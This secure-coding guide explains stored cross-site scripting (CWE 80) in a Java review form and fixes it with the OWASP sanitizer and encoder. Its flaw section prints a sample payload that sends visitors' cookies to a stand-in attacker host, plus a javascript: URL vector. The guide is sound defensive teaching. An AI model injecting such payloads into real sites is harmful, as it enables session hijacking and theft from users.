CWE 80: CROSS-SITE SCRIPTING

Flaw

CWE 80: Cross-Site Scripting (XSS) is a flaw that lets attackers execute unauthorized scripts in your users' browsers. In an XSS attack, the attacker finds inputs that allow scripts to be injected into the HTML page via script tags, attributes, and other paths. This is commonly achieved through input sources such as web forms, cookies, and headers. XSS attacks can be made persistent by getting your application to store the malicious content (e.g. in a database or key-value store) for later display.

For example:

<h2>Enter your review:</h2>
    <form name="ratingForm">
        <label>Your Rating (1-5 stars):</label>
        <input type="text" name="stars">
        <label>Details:</label>
        <input type="text" name="details">
        <input type="submit" formaction="/submitReview" value="Submit">
    </form>

This form gives the user two fields for sending data to the application. Users enter a star rating and some details, then click the submit button. The Java web application adds this data to a new Review object.

public void setStars(int stars) {
    this.stars = stars;
}

public void setDetails(String details) {
    this.details = details;
}

// getParameter() takes the field name as a string and returns a String
int myStars = Integer.parseInt(request.getParameter("stars"));
String myDetails = request.getParameter("details");

Review myReview = new Review();
myReview.setStars(myStars);
myReview.setDetails(myDetails);

product.addReview(myReview);

After the form is submitted and processed, the product's new review appears on a "See Reviews" page, visible to all users. The HTML on that page renders information from the review:

<script>
document.getElementById("stars").innerHTML = stars;
document.getElementById("details").innerHTML = details;
</script>
...
<p>This item has <span id="stars"></span> stars:</p>
<div id="details"></div>

The page will display any data that the user supplied in the review. When the browser renders the page, it cannot infer whether any elements came from malicious sources -- it simply renders the contents of the source.

For example, if a user submits the following review details:

<script>document.location='http://malicious.domain/attackscripts/stealUserCookie.js?'+document.cookie</script>

This would result in the following HTML:

<p>This item has <span id="stars">5</span> stars:</p>
<div id="details"><script>document.location='http://malicious.domain/attackscripts/stealUserCookie.js?'+document.cookie</script></div>

When a user visits the page, the script will run and redirect the browser to the malicious URL.

In this case, stealUserCookie.js is a remotely hosted script that receives the user's cookie -- readable by JavaScript by default -- in the query string and passes it to an attacker. The cookie will likely allow the attacker to hijack the visiting user's session, and could contain additional data of value to the attacker. This is only one of many attacks that are possible if you have an XSS flaw.

By unexpectedly injecting malicious scripts into sources of user input, an attacker can use your web application to attack your users.

NB: the stars field isn't vulnerable to XSS because setStars() only accepts an int, which means an attacker can't successfully submit a script.
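The NB above assumes the submitted value is converted to an int before it reaches setStars(). A minimal sketch of that conversion follows. The class and method names (StarsInput, parseStars) are hypothetical, and the 1-5 range check is an assumption taken from the form label rather than from the application code.

```java
import java.util.OptionalInt;

/** Hypothetical helper for illustration; not part of the original application. */
final class StarsInput {
    private StarsInput() {}

    /** Returns the rating if raw is a whole number from 1 to 5, otherwise empty. */
    static OptionalInt parseStars(String raw) {
        if (raw == null) {
            return OptionalInt.empty();
        }
        try {
            int value = Integer.parseInt(raw.trim());
            // Assumed range, based on the "1-5 stars" label in the form
            return (value >= 1 && value <= 5) ? OptionalInt.of(value) : OptionalInt.empty();
        } catch (NumberFormatException e) {
            // Markup such as "<script>...</script>" is not a number, so it is rejected here
            return OptionalInt.empty();
        }
    }

    public static void main(String[] args) {
        System.out.println(parseStars("5").isPresent());
        System.out.println(parseStars("<script>alert(1)</script>").isPresent());
    }
}
```

Rejecting the value at parse time means a script payload never reaches the Review object through this field.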

Script tags are not the only attack vector. Entries such as <a href='javascript:alert("XSS");'> work just as well. XSS can occur anywhere untrusted input is included in an HTML page.

Fix

To prevent Cross-Site Scripting, you must ensure that your application correctly handles any untrusted data before outputting it to users. There are several ways to accomplish this, but the two most common are to sanitize untrusted HTML or to contextually escape the data.

In Java, you can use the OWASP Java HTML Sanitizer to define which HTML elements or attributes are allowed in user input. This enables the user to continue using certain tags (to format text, for example) but will effectively block other, unwanted content.

The sanitization policy is then defined in the Java code. Perhaps we only want to permit the tags p, ul, ol, li, b, i, and a; and we also want to make sure links (<a href=...) only allow http, https, and mailto links. Then we would do something like:

private final HtmlPolicyBuilder DetailsPolicyBuilder = new HtmlPolicyBuilder()
    .allowElements("p", "ul", "ol", "li", "b", "i", "a")
    .allowStandardUrlProtocols()               // http, https, and mailto
    .allowAttributes("href").onElements("a");  // a tags can have an href attribute

The sanitize method of the resulting policy can then be applied to any untrusted data to render it safe for display. Here, it is applied to the review:

+
+private final HtmlPolicyBuilder DetailsPolicyBuilder = new HtmlPolicyBuilder()
+    .allowElements("p", "ul", "ol", "li", "b", "i", "a")
+    .allowStandardUrlProtocols()               // http, https, and mailto
+    .allowAttributes("href").onElements("a");  // a tags can have an href attribute
+
 public void setStars(int stars) {
    this.stars = stars;
 }
 
 public void setDetails(String details) {
-   this.details = details;
+   this.details = DetailsPolicyBuilder.toFactory().sanitize(details);
 }
 
 int myStars = Integer.parseInt(request.getParameter("stars"));

This approach renders the HTML safe for display. The sanitizer permits only the elements and attributes listed above and discards anything that doesn't fit, including script tags and javascript: URLs. It's generally not necessary to encode numerical data types, so the method is not applied to stars. (Note: depending on the architecture of your application, it may be preferable to apply the sanitization at a different point in the data flow.)
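To make the URL part of such a policy concrete, here is a standard-library-only sketch of an allow-list check on link schemes. It is not how the OWASP sanitizer is implemented, and it is no substitute for it. The class name LinkSchemeCheck and the method hasAllowedScheme are hypothetical, and this simplified version also rejects relative links.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

/** Hypothetical illustration of a scheme allow-list; use a real sanitizer in production. */
final class LinkSchemeCheck {
    // Same schemes the policy above is described as permitting
    private static final Set<String> ALLOWED = Set.of("http", "https", "mailto");

    private LinkSchemeCheck() {}

    /** Returns true only if href parses as a URI whose scheme is on the allow-list. */
    static boolean hasAllowedScheme(String href) {
        if (href == null) {
            return false;
        }
        try {
            String scheme = new URI(href.trim()).getScheme();
            // Schemes are case-insensitive, so normalize before comparing
            return scheme != null && ALLOWED.contains(scheme.toLowerCase(Locale.ROOT));
        } catch (URISyntaxException e) {
            // Anything that does not parse cleanly is treated as unsafe
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(hasAllowedScheme("https://example.com/page"));
        System.out.println(hasAllowedScheme("javascript:alert(1)"));
    }
}
```

The check is an allow-list rather than a block-list: it names the few schemes that are acceptable instead of trying to enumerate every dangerous one.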

A second approach is to encode data for the context in which it will be displayed. Encoding transforms the characters that function as syntax in the destination context (HTML, JavaScript, etc.) into versions that appear the same on-screen, but will not be parsed as syntax. For example, encoding data for HTML output replaces characters like < and > -- characters with special meanings in HTML documents -- with equivalent sequences that cannot change the structure of the surrounding context.

NB: the < and > characters aren't the only ones that need encoding. Be sure to use a well-tested HTML-encoding library instead of just String.replaceAll().
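To show what this transformation looks like, the following sketch encodes five characters for HTML content. It is for illustration only and is not a replacement for a well-tested library: the class HtmlEncodingDemo and the method encodeForHtml are hypothetical, and the character set covered here is an assumption that does not address attribute, JavaScript, or URL contexts.

```java
/** Illustration only: shows the effect of HTML encoding, not a production encoder. */
final class HtmlEncodingDemo {
    private HtmlEncodingDemo() {}

    /** Replaces characters that act as HTML syntax with entity references. */
    static String encodeForHtml(String input) {
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String details = "<script>alert('XSS')</script>";
        // Unencoded: the browser would parse this as a script element
        System.out.println("<div id=\"details\">" + details + "</div>");
        // Encoded: the browser would display the payload as literal text
        System.out.println("<div id=\"details\">" + encodeForHtml(details) + "</div>");
    }
}
```

The encoded string looks identical to the original when rendered, but it contains no characters that the HTML parser treats as markup.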

In Java, you can use the OWASP Java Encoder within your templates to prepare untrusted data for output. Here is the JavaScript from the same template as before, modified to use this library:

document.getElementById("stars").innerHTML = stars;
-  document.getElementById("details").innerHTML = details;
+  document.getElementById("details").innerHTML = "<%= Encode.forJavaScript(Encode.forHtmlContent(details)) %>";

If the attacker were to attempt to run the same payload as before, here is how it would appear in the final document:

<td>Review #1</td>
<td>Evil User</td>
<td>&#x3C;script&#x3E;document.location='http://malicious.domain/attackscripts/stealUserCookie.js?'+document.cookie&#x3C;/script&#x3E;</td>

The browser correctly interprets &#x3C;script&#x3E; as text to render rather than tags to interpret, so the script will not run. Instead, the literal text as submitted appears as the output. Using this approach with a method selected for the right context (forHtmlAttribute, forJavaScriptBlock, etc.) can prevent a wide range of XSS attacks.
